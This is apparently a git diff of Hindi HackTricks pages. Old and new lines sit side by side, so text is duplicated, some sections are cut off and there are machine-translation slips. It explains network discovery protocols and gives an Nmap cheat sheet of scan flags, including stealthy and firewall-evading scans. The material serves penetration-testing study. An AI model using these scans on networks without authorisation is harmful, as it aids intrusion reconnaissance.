* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %}

View file

@ -1,55 +1,57 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को** **फॉलो** करें।
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को पीआर जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
## Multicast DNS (mDNS) ## मल्टीकास्ट DNS (mDNS)
**mDNS** प्रोटोकॉल एक विशेषित नाम सर्वर के बिना छोटे, स्थानीय नेटवर्क में IP पता सुलझाने के लिए डिज़ाइन किया गया है। यह सबनेट के भीतर एक क्वेरी को मल्टीकास्ट करके संचालित होता है, जिससे निर्दिष्ट नाम वाले होस्ट को अपना IP पता देने के लिए प्रोत्साहित किया जाता है। इस सूचना के साथ सभी उपकरण स्वयं अपने mDNS कैश को अपडेट कर सकते हैं। **mDNS** प्रोटोकॉल एक डेडिकेटेड नेम सर्वर के बिना छोटे, स्थानीय नेटवर्क में आईपी पता सुलझाने के लिए डिज़ाइन किया गया है। यह सबनेट के भीतर एक क्वेरी को मल्टीकास्ट करके ऑपरेट करता है, जिससे निर्दिष्ट नाम वाले होस्ट से उसका आईपी पता प्रतिसाद देने के लिए प्रोत्साहित किया जाता है। इस जानकारी के साथ सबनेट में सभी उपकरण फिर अपने mDNS कैश को अपडेट कर सकते हैं।
महत्वपूर्ण बिंदुओं को ध्यान में रखें: महत्वपूर्ण बिंदुओं को ध्यान में रखें:
- **डोमेन नाम त्यागना**: एक होस्ट अपना डोमेन नाम जारी कर सकता है जब वह जीरो की TTL के साथ एक पैकेट भेजता है। - **डोमेन नाम त्यागना**: एक होस्ट अपना डोमेन नाम जारी कर सकता है जब वह एक जीरो के TTL के साथ एक पैकेट भेजता है।
- **उपयोग प्रतिबंध**: mDNS सामान्यत: केवल **.local** समाप्त होने वाले नामों को सुलझाता है। इस डोमेन में गैर-mDNS होस्ट्स के साथ संघर्ष के लिए नेटवर्क कॉन्फ़िगरेशन समायोजन की आवश्यकता होती है। - **उपयोग प्रतिबंध**: mDNS आम तौर पर केवल **.local** समाप्त होने वाले नामों को सुलझाता है। इस डोमेन में गैर-mDNS होस्ट्स के साथ संघर्ष के लिए नेटवर्क कॉन्फ़िगरेशन समायोजन की आवश्यकता होती है।
- **नेटवर्किंग विवरण**: - **नेटवर्किंग विवरण**:
- ईथरनेट मल्टीकास्ट MAC पते: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB` - ईथरनेट मल्टीकास्ट MAC पते: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`
- IP पते: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb` - आईपी पते: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`
- UDP पोर्ट 5353 पर संचालित होता है। - UDP पोर्ट 5353 पर ऑपरेट करता है।
- mDNS क्वेरी स्थानीय नेटवर्क में सीमित होती है और राउटर्स को पार नहीं करती। - mDNS क्वेरी स्थानीय नेटवर्क में सीमित होती है और राउटर्स को पार नहीं करती है
## DNS-SD (सेवा खोज) ## DNS-SD (सेवा खोज)
DNS-SD एक प्रोटोकॉल है जो नेटवर्क पर सेवाओं को खोजने के लिए विशिष्ट डोमेन नामों (जैसे, `_printers._tcp.local`) का क्वेरी करके काम करता है। एक प्रतिक्रिया में सभी संबंधित डोमेन शामिल होते हैं, जैसे इस मामले में उपलब्ध प्रिंटर। एक समग्र सेवा प्रकारों की सूची [यहाँ](http://www.dns-sd.org/ServiceTypes.html) मिल सकती है। DNS-SD एक प्रोटोकॉल है जो नेटवर्क पर सेवाओं को खोजने के लिए विशिष्ट डोमेन नामों (जैसे, `_printers._tcp.local`) क्वेरी करके डिस्कवरी करता है। एक प्रतिक्रिया में सभी संबंधित डोमेन शामिल होते हैं, जैसे इस मामले में उपलब्ध प्रिंटर। एक समग्र सेवा प्रकारों की सूची [यहाँ](http://www.dns-sd.org/ServiceTypes.html) मिल सकती है।
## SSDP (सिम्पल सेवा खोज प्रोटोकॉल) ## SSDP (सिम्पल सेवा डिस्कवरी प्रोटोकॉल)
SSDP नेटवर्क सेवाओं की खोज को सुविधाजनक बनाता है और मुख्य रूप से UPnP द्वारा उपयोग किया जाता है। यह एक पाठ-आधारित प्रोटोकॉल है जो UDP का उपयोग करता है (पोर्ट 1900 पर), मल्टीकास्ट पतों के साथ। IPv4 के लिए, निर्धारित मल्टीकास्ट पता है `239.255.255.250`। SSDP की आधारभूतता [HTTPU](https://en.wikipedia.org/wiki/HTTPU) है, जो UDP के लिए HTTP का एक विस्तार है। SSDP नेटवर्क सेवाओं की खोज को सुविधाजनक बनाता है और मुख्य रूप से UPnP द्वारा उपयोग किया जाता है। यह मल्टीकास्ट पतों का उपयोग करता है, जो UDP पर पोर्ट 1900 के माध्यम से होता है। IPv4 के लिए, निर्धारित मल्टीकास्ट पता `239.255.255.250` है। SSDP की आधारभूत बुनियाद [HTTPU](https://en.wikipedia.org/wiki/HTTPU) है, जो UDP के लिए HTTP का एक विस्तार है।
## उपकरणों के लिए वेब सेवा (WSD)
नेटवर्क से जुड़े उपकरण वेब सेवा के माध्यम से उपलब्ध सेवाओं की पहचान कर सकते हैं, जैसे प्रिंटर। इसमें UDP पैकेटों को ब्रॉडकास्ट करना शामिल है। सेवाएं चाहने वाले उपकरण अनुरोध भेजते हैं, जबकि सेवा प्रदाताएं अपने प्रस्तावों की घोषणा करती हैं। ## डिवाइस के लिए वेब सेवा (WSD)
नेटवर्क से जुड़े डिवाइस वेब सेवा के माध्यम से उपलब्ध सेवाओं की पहचान कर सकते हैं, जैसे प्रिंटर, इसमें UDP पैकेट्स को ब्रॉडकास्ट करना शामिल है। सेवाएं चाहने वाले डिवाइस अनुरोध भेजते हैं, जबकि सेवा प्रदाताएं अपने प्रस्तावों की घोषणा करते हैं।
## OAuth 2.0 ## OAuth 2.0
OAuth 2.0 एक प्रोटोकॉल है जो सुरक्षित, विवेकपूर्ण रूप से उपयोगकर्ता जानकारी का साझा करना सुनिश्चित करने में सहायक है। उदाहरण के लिए, यह सेवाओं को बिना कई लॉगिन किए गूगल से उपयोगकर्ता डेटा तक पहुंचने की सुविधा प्रदान करता है। इस प्रक्रिया में उपयोगकर्ता प्रमाणीकरण, उपयोगकर्ता द्वारा अधिकृति, और गूगल द्वारा टोकन उत्पादन शामिल है, जिससे सेवा निर्दिष्ट उपयोगकर्ता डेटा तक पहुंच ी है। OAuth 2.0 एक प्रोटोकॉल है जो सुरक्षित, चयनित रूप से उपयोगकर्ता जानकारी का साझा करना सुनिश्चित करता है सेवाओं के बीच। उदाहरण के लिए, यह सेवाओं को बिना कई लॉगिन किए गूगल से उपयोगकर्ता डेटा तक पहुंचने की सुविधा प्रदान करता है। इस प्रक्रिया में उपयोगकर्ता प्रमाणीकरण, उपयोगकर्ता द्वारा अधिकृति, और गूगल द्वारा टोकन उत्पादन शामिल है, जो सेवा को निर्दिष्ट उपयोगकर्ता डेटा तक पहुंचने की अनुमति देता है।
## RADIUS ## RADIUS
RADIUS (Remote Authentication Dial-In User Service) एक नेटवर्क पहुंच प्रोटोकॉल है जिसका मुख्य रूप से आईएसपीएस द्वारा उपयोग किया जाता है। यह प्रमाणीकरण, अधिकृति, और लेखा समर्थन का समर्थन करता है। उपयोगकर्ता क्रेडेंशियल RADIUS सर्वर द्वारा सत्यापित किए जाते हैं, जिसमें सुरक्षा जोड़ने के लिए नेटवर्क पते सत्यापित हो सकते हैं। पोस्ट-प्रमाणीकरण, उपयोगकर्ताओं को नेटवर्क पहुंच मिलती है और उनका सत्र विवरण बिलिंग और सांख्यिकीय उद्देश्यों के लिए ट्रैक किए जाते हैं। RADIUS (Remote Authentication Dial-In User Service) एक नेटवर्क एक्सेस प्रोटोकॉल है जिसे मुख्य रूप से आईएसपी द्वारा उपयोग किया जाता है। यह प्रमाणीकरण, अधिकृति, और लेखा समर्थन का समर्थन करता है। उपयोगकर्ता क्रेडेंशियल RADIUS सर्वर द्वारा सत्यापित किए जाते हैं, जिसमें सुरक्षा जोड़ने के लिए नेटवर्क पते सत्यापित हो सकते हैं। पोस्ट-प्रमाणीकरण, उपयोगकर्ताओं को नेटवर्क पहुंच मिलती है और उनका सत्र विवरण बिलिंग और सांख्यिकीय उद्देश्यों के लिए ट्रैक किए जाते हैं।
## SMB और NetBIOS ## SMB और NetBIOS
### SMB (सर्वर संदेश ब्लॉक) ### SMB (सर्वर मैसेज ब्लॉक)
SMB एक प्रोटोकॉल है जो फ़ाइल, प्रिंटर, और पोर्ट साझा करने के लिए है। यह सीधे TCP (पोर्ट 445) के माध्यम से या NetBIOS के माध्यम से TCP (पोर्ट 137, 138) के माध्यम से संचालित होता है। यह दोहरी संगतता विभिन्न उपकरणों के साथ कनेक्टिविटी को बढ़ाती है। SMB एक प्रोटोकॉल है जो फ़ाइल, प्रिंटर, और पोर्ट साझा करने के लिए है। यह सीधे TCP (पोर्ट 445) पर या NetBIOS के माध्यम से TCP (पोर्ट 137, 138) के माध्यम से काम करता है। यह दोहरी संगतता विभिन्न उपकरणों के साथ कनेक्टिविटी को बढ़ाती है।
### NetBIOS (नेटवर्क बेसिक इनपुट/आउटपुट सिस्टम) ### NetBIOS (नेटवर्क बेसिक इनपुट/आउटपुट सिस्टम)
NetBIOS नेटवर्क सत्र और संसाधन साझा करने के लिए नेटवर्क सत्र और कनेक्शनों का प्रबंधन करता है। यह उपकरणों के लिए अद्वितीय नामों का समर्थन करता है और एकाधिक उपकरणों के लिए समूह नामों का समर्थन करता है, लक्षित या ब्रॉडकास्ट संदेश भेजने की संभावना देता है। संचार संबंधित या सत्र-आधारित हो सकता है। जबकि NetBIOS पारंपरिक रूप से प्रोटोकॉलों जैसे IPC/IPX के माध्यम से संचालित होता है, यह आमतौर पर TCP/IP के माध्यम से उपयोग किया जाता है। NetBEUI, एक संबंधित प्रोटोकॉल, अपनी गति के लिए जाना जाता है, लेकिन ब्रॉडकास्टिंग के कारण भी काफी व्याख्यात्मक था। NetBIOS नेटवर्क सत्र और संयोजनों का प्रबंधन करता है रिसोर्स साझा करने के लिए। यह उपकरणों के लिए अद्वितीय नामों का समर्थन करता है और एकाधिक उपकरणों के लिए समूह नामों का समर्थन करता है, लक्षित या ब्रॉडकास्ट संदेश भेजने की संभावना देता है। संचार कनेक्शनलेस (कोई स्वीकृति नहीं) या कनेक्शन-विषयक (सत्र-आधारित) हो सकती है। जबकि NetBIOS पारंपरिक रूप से प्रोटोकॉलों के ऊपर ऑपरेट करता है जैसे IPC/IPX, यह आमतौर पर TCP/IP के ऊपर उपयोग किया जाता है। NetBEUI, एक संबंधित प्रोटोकॉल, अपनी गति के लिए जाना जाता है लेकिन ब्रॉडकास्टिंग के कारण भी काफी व्याख्यात्मक था।
## LDAP (लाइटवेट डायरेक्टरी एक्सेस प्रोटोकॉल) ## LDAP (लाइटवेट डायरेक्टरी एक्सेस प्रोटोकॉल)
LDAP एक प्रोटोकॉल है जो TCP/IP के माध्यम से निर्देशिका सूचना के प्रबंधन और पहुंच को संभावित बनाता है। यह विभिन्न प्रश्नों का समर्थन करता है जिसके लिए निर्देशिका सूचना का प्रश्न LDAP एक प्रोटोकॉल है जो TCP/IP के माध्यम से निर्देशिका सूचना का प्रबंधन और पहुंच संभव बनाता है। यह विभिन्न प्रश्नों का समर्थन करता है जिसके लिए निर्देशिका सू

View file

@ -1,18 +1,19 @@
# Nmap सारांश (ESP) # Nmap सारांश (ESP)
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure> <figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -24,39 +25,39 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
### स्कैन करने के लिए IPs ### स्कैन करने के लिए IPs
* **`<ip>,<net/mask>`:** IPs को सीधे इंडिकेट करें * **`<ip>,<net/mask>`:** सीधे IPs को दर्शाता है
* **`-iL <ips_file>`:** सूची_IPs * **`-iL <ips_file>`:** सूची_IPs
* **`-iR <number>`**: रैंडम IPs की संख्या, आप `--exclude <Ips>` या `--excludefile <file>` के साथ संभावित IPs को बाहर कर सकते हैं। * **`-iR <number>`**: यादृच्छिक Ips की संख्या, आप `--exclude <Ips>` या `--excludefile <file>` के साथ संभावित Ips को छोड़ सकते हैं।
### उपकरण खोज ### उपकरण खोज
निम्नलिखित डिस्कवरी फेज को लॉन्च करता है Nmap: `-PA80 -PS443 -PE -PP` निम्नलिखित डिस्कवरी चरण को लॉन्च करता है Nmap: `-PA80 -PS443 -PE -PP`
* **`-sL`**: यह अत्यधिक आक्रामक नहीं है, यह लक्ष्यों की सूची बनाता है जिसमें नामों को हल करने के लिए **DNS** अनुरोध किए जाते हैं। यह उपयोगी है यदि आप जानना चाहते हैं कि क्या उदाहरण के लिए www.prueba.es/24 सभी IPs हमारे लक्ष्य हैं। * **`-sL`**: यह आक्रामक नहीं है, यह लक्ष्यों की सूची बनाता है जो नामों को हल करने के लिए **DNS** अनुरोध करते हैं। यह उपयोगी है यदि आप जानना चाहते हैं कि क्या उदाहरण के लिए www.prueba.es/24 सभी Ips हमारे लक्ष्य हैं।
* **`-Pn`**: **कोई पिंग नहीं**। यह उपयोगी है अगर आप जानते हैं कि सभी वे सक्रिय हैं (अगर नहीं, तो आप बहुत समय खो सकते हैं, लेकिन यह विकल्प भी गलत नकारात्मक परिणाम देता है कि वे सक्रिय नहीं हैं), यह डिस्कवरी फेज को रोकता है। * **`-Pn`**: **कोई पिंग नहीं**। यह उपयोगी है अगर आप जानते हैं कि सभी उनमें सक्रिय हैं (अगर नहीं, तो आप बहुत समय खो सकते हैं, लेकिन यह विकल्प भी गलत नकारात्मक उत्तर देता है कि वे सक्रिय नहीं हैं), यह खोज चरण को रोकता है।
* **`-sn`** : **कोई पोर्ट स्कैन नहीं**। अनुसंधान फेज पूरा करने के बाद, यह पोर्ट स्कैन नहीं करता है। यह अपेक्षाकृत छिपकली है, और एक छोटे नेटवर्क स्कैन करने की अनुमति देता है। विशेषाधिकारों के साथ, यह 80 को ACK (-PA) भेजता है, 443 को SYN(-PS) भेजता है और एक इको अनुरोध और एक समयचिह्न अनुरोध भेजता है, बिना विशेषाधिकारों के हमेशा कनेक्शन पूरा होता है। यदि लक्ष्य नेटवर्क है, तो केवल ARP(-PR) का उपयोग किया जाता है। यदि दूसरे विकल्प के साथ उपयोग किया जाता है, तो केवल दूसरे विकल्प के पैकेट ड्रॉप किए जाते हैं। * **`-sn`** : **कोई पोर्ट स्कैन नहीं**। अन्वेषण चरण पूरा करने के बाद, यह पोर्ट स्कैन नहीं करता है। यह अनुमानित रूे छिपकली, और एक छोटे नेटवर्क स्कैन करने देता है। विशेषाधिकारों के साथ यह 80 को ACK (-PA) भेजता है, 443 को SYN(-PS) भेजता है और एक इको अनुरोध और एक समयचिह्न अनुरोध भेजता है, बिना विशेषाधिकारों के यह हमेशा कनेक्शन पूरा करता है। यदि लक्ष्य नेटवर्क है, तो यह केवल ARP(-PR) का उपयोग करता है। यदि इसे किसी अन्य विकल्प के साथ उपयोग किया जाता है, तो केवल अन्य विकल्प के पैकेट ड्रॉप होते हैं।
* **`-PR`**: **पिंग ARP**। यह डिफ़ॉल्ट रूप से हमारे नेटवर्क में कंप्यूटरों का विश्लेषण करते समय उपयोग किया जाता है, यह पिंग का उपयोग करने से तेज है। यदि आप ARP पैकेट का उपयोग नहीं करना चाहते हैं तो `--send-ip` का उपयोग करें। * **`-PR`**: **पिंग ARP**। यह डिफ़ॉल्ट रूप से हमारे नेटवर्क में कंप्यूटरों का विश्लेषण करते समय उपयोग किया जाता है, यह पिंग का उपयोग करने से तेज है। यदि आप ARP पैकेट का उपयोग नहीं करना चाहते हैं तो `--send-ip` का उपयोग करें।
* **`-PS <ports>`**: यह SYN पैकेट भेजता है जिसे यदि यह SYN/ACK के साथ जवाब देता है तो खुला है (जिसे यह RST के साथ जवाब देता है ताकि कनेक्शन समाप्त न हो), यदि यह RST के साथ जवाब देता है तो बंद है और यदि यह जवाब नहीं देता है तो अगम्य है। यदि विशेषाधिकार नहीं हैं, तो सम्पूर्ण कनेक्शन स्वचालित रूप से उपयोग किया जाता है। यदि कोई पोर्ट नहीं दिया गया है, तो यह 80 पर फेंक देता है। * **`-PS <ports>`**: यह SYN पैकेट भेजता है जिसे यदि यह SYN/ACK के साथ जवाब देता है तो खुला है (जिसे यह RST के साथ जवाब देता है ताकि कनेक्शन समाप्त न हो), यदि यह RST के साथ जवाब देता है तो बंद है और यदि यह जवाब नहीं देता है तो अगम्य है। यदि विशेषाधिकार नहीं हैं, तो समूचा कनेक्शन स्वचालित रूप से उपयोग किया जाता है। यदि कोई पोर्ट नहीं दिया गया है, तो यह 80 पर फेंक देता है।
* **`-PA <ports>`**: पिछले वाले की तरह लेकिन ACK के साथ, दोनों को मिलाकर बेहतर परिणाम मिलते हैं। * **`-PA <ports>`**: पिछले वाले की तरह लेकिन ACK के साथ, दोनों को मिलाकर बेहतर परिणाम मिलते हैं।
* **`-PU <ports>`**: उद्देश्य उल्टा है, यह बंद होने की उम्मीद है। कुछ फ़ायरवॉल केवल TCP कनेक्शन की जांच करते हैं। यदि यह बंद है तो यह पोर्ट अप्राप् है, यदि यह किसी अन्य icmp के साथ जवाब देता है या जवाब नहीं देता है तो यह गंतव्य अप्राप्य छोड़ दिया जा है। * **`-PU <ports>`**: उद्देश्य उल्टा है, जो बंद होने की उम्मीद है। कुछ फ़ायरवॉल केवल TCP कनेक्शन की जांच करते हैं। यदि यह बंद है तो यह पोर्ट अप्राप् है, यदि यह किसी अन्य icmp के साथ जवाब देता है या जवाब नहीं देता है तो यह गंतव्य अप्राप्त है।
* **`-PE, -PP, -PM`** : ICMP PINGS: इको प्रतिद्वंद्वी, समयचिह्न और एड्रेसमास्क। यह लॉन्च किया जाता है ताकि पता चले कि लक्ष्य सक्रिय है या नहीं। * **`-PE, -PP, -PM`** : ICMP PINGS: इको प्रतिद्वंद्वीकरण, समयचिह्न और एड्रेसमास्क। यह लॉन्च किए जाते हैं ताकि पता चले कि लक्ष्य सक्रिय है या नहीं।
* **`-PY<ports>`**: 80 के लिए SCTP INIT प्रोब भेजता है, INIT-ACK(खुला) या ABORT(बंद) या कुछ नहीं या ICMP अप्राप्(निष्क्रिय) जवाब दिया जा सकता है। * **`-PY<ports>`**: 80 के लिए SCTP INIT प्रोब भेजता है, INIT-ACK(खुला) या ABORT(बंद) या कुछ नहीं या ICMP अप्राप्(निष्क्रिय) जवाब दिया जा सकता है।
* **`-PO <protocols>`**: हेडर में एक प्रोटोकॉल निर्दिष्ट किया जाता है, डिफ़ॉल्ट रूप से 1(ICMP), 2(IGMP) और 4(Encap IP)। ICMP, IGMP, TCP (6) और UDP (17) प्रोटोकॉल के लिए प्रोटोकॉल हेडर भेजे जाते हैं, बाकी के लिए केवल IP हेडर भेजा जाता है। इसका उद्देश्य है कि हेडर्स की गलत बनावट के कारण प्रोटोकॉल अप्राप्य या उसी प्रोटोकॉल के जवाब दिए जाते हैं ताकि पता चले कि यह ऊपर है या नहीं। * **`-PO <protocols>`**: हेडर में एक प्रोटोकॉल दिखाया जाता है, डिफ़ॉल्ट रूप से 1(ICMP), 2(IGMP) और 4(Encap IP)। ICMP, IGMP, TCP (6) और UDP (17) प्रोटोकॉल के लिए प्रोटोकॉल हेडर भेजे जाते हैं, बाकी के लिए केवल IP हेडर भेजा जाता है। इसका उद्देश्य यह है कि हेडर्स के गलत रूपांतरण के कारण प्रोटोकॉल अप्राप्त या उसी प्रोटोकॉल के जवाब दिए जाते हैं ताकि पता चले कि यह ऊपर है या नहीं।
* **`-n`**: कोई DNS नहीं * **`-n`**: कोई DNS नहीं
* **`-R`**: हमेशा DNS * **`-R`**: हमेशा DNS
### पोर्ट स्कैनिंग तकनीकें ### पोर्ट स्कैनिंग तकनीकें
* **`-sS`**: कनेक्शन को पूरा नहीं करता है इसलिए कोई पता नहीं छोड़ता, अगर उपयोग किया जा सकता है तो बहुत अच्छा है।(विशेषाधिकार) यह डिफ़ॉल्ट रूप से उपयोग किया जाता है। * **`-sS`**: कनेक्शन को पूरा नहीं करता है इसलिए कोई पता नहीं छोड़ता, अगर इस्तेमाल किया जा सकता है तो बहुत अच्छा है।(विशेषाधिकार) यह डिफ़ॉल्ट रूप से उपयोग किया जाता है।
* **`-sT`**: कनेक्शन पूरा करता है, इसलिए यह पता छोड़ता है, लेकिन यह सुनिश्चित करने के लिए उपयोग किया जा सकता है। डिफ़ॉल्ट रूप से विशेषाधिकार नहीं है * **`-sT`**: कनेक्शन पूरा करता है, इसलिए यह पता छोड़ता है, लेकिन यह सुनिश्चित करने के लिए उपयोग किया जा सकता है। डिफ़ॉल्ट रूप से विशेषाधिकारों के बिना
* **`-sU`**: धीमा, UDP के लिए। अधिकांश: DNS(53), SNMP(161,162), DHCP(67 और 68), (-sU53,161,162,67,68): खुला(जवाब), बंद(पोर्ट अप्राप्), फ़िल्टर(अन्य ICMP), खुला/फ़िल्टर(कुछ नहीं)। खुला/फ़िल्टर के मामले में, -sV न्यूनतम संभावनाओं को जानने के लिए कई अनुरोध भेजता है और nmap समर्थित किसी भी संस्करण का पता लगा सकता है और वास्तविक स्थिति का पता लगा सकता है। यह समय को बहुत बढ़ा देता है। * **`-sU`**: धीमा, UDP के लिए। अधिकांश: DNS(53), SNMP(161,162), DHCP(67 और 68), (-sU53,161,162,67,68): खुला(जवाब), बंद(पोर्ट अप्राप्), फ़िल्टर(अन्य ICMP), खुला/फ़िल्टर(कुछ नहीं)। खुला/फ़िल्टर के मामले में, -sV न्यूनतम संभावनाओं को खोजने के लिए कई अनुरोध भेजता है और nmap समर्थित किसी भी संस्करण का पता लगा सकता है और वास्तविक स्थिति का पता लगा सकता है। यह समय को बहुत बढ़ा देता है।
* **`-sY`**: SCTP प्रोटोकॉल कनेक्शन स्थापित करने में विफल होता है, इसलिए कोई लॉग नहीं होता, -PY की तरह काम करता है * **`-sY`**: SCTP प्रोटोकॉल कनेक्शन स्थापित करने में विफल होता है, इसलिए कोई लॉग नहीं होता, -PY की तरह काम करता है
* **`-sN,-sX,-sF`:** नल, फिन, ्रिसमस, वे कुछ फ़ायरवॉल में प्रवेश कर सकते हैं और जानकारी निकाल सकते हैं। यह उस तथ्य पर आधारित है कि मानक अनुरूप मशीनें उन सभी अनुरोधों के साथ RST देना चाहिए जिनमें SYN, RST या ACK लैग उठाए नहीं हैं: खुला/फ़िल्टर(कुछ नहीं), बंद(RST), फ़िल्टर(अन्य ICMP)। विंडोज, सिस्को, बीएसडीआई और ओएस/400 पर अविश्वसनीय है। यूनिक्स पर हां। * **`-sN,-sX,-sF`:** नल, फिन, ्रिसमस, वे कुछ फ़ायरवॉल में प्रवेश कर सकते हैं और जानकारी निकाल सकते हैं। यह उस तथ्य पर आधारित है कि मानक अनुरूप मशीनें उन सभी अनुरोधों के साथ RST के साथ प्रतिक्रिया करना चाहिए जिनमें SYN, RST या ACK लैग उठाए गए हैं: खुला/फ़िल्टर(कुछ नहीं), बंद(RST), फ़िल्टर(अन्य ICMP)। विंडोज, सिस्को, बीएसडीआई और ओएस/400 पर अविश्वसनीय है। यूनिक्स पर हां।
* **`-sM`**: मैमन स्कैन: FIN और ACK फ्लैग भेजता है, वर्तमान में सभी को बंद के रूप में लौटाएगा। * **`-sM`**: मैमन स्कैन: FIN और ACK लैग भेजता है, बीएसडी के लिए उपयोग किया जाता है, वर्तमान में सभी को बंद ही वापस करेगा।
* **`-sA, sW`**: ACK और विंडो, फ़ायरवॉल का पता लगाने के लिए उपयोग किया जाता है, यह जानने के लिए कि पोर्ट फ़िल्टर हैं या नहीं। -sW खुला/बंद के बीच भेद करता है क्योंकि खुले वाले अलग विंडो मान देते हैं: खुला (जवाब विंडो 0 के अलावा), बंद (बंद विंडो = 0), फ़िल्टर (ICMP अप * **`-sA, sW`**: ACK और विंडो, फ़ायरवॉल का पता लगाने के लिए उपयोग किया जाता है, यह जानने के लिए कि पोर्ट फ़िल्टर हैं या नहीं। -sW खुला/बंद के बीच भेद करता है क्योंकि खुले वाले अलग विंडो मान देते हैं: खुला (जवाब में विंडो 0 के अलावा RST), बंद (RST विंडो = 0), फ़िल्टर (ICMP
**--osscan-guess** जब ऑपरेटिंग सिस्टम की पहचान पूरी तरह से सही नहीं होती है तो यह अधिक प्रयास करता है। **--osscan-guess** जब ऑपरेटिंग सिस्टम की पहचान पूरी तरह से सही नहीं होती है तो यह अधिक प्रयास करता है।
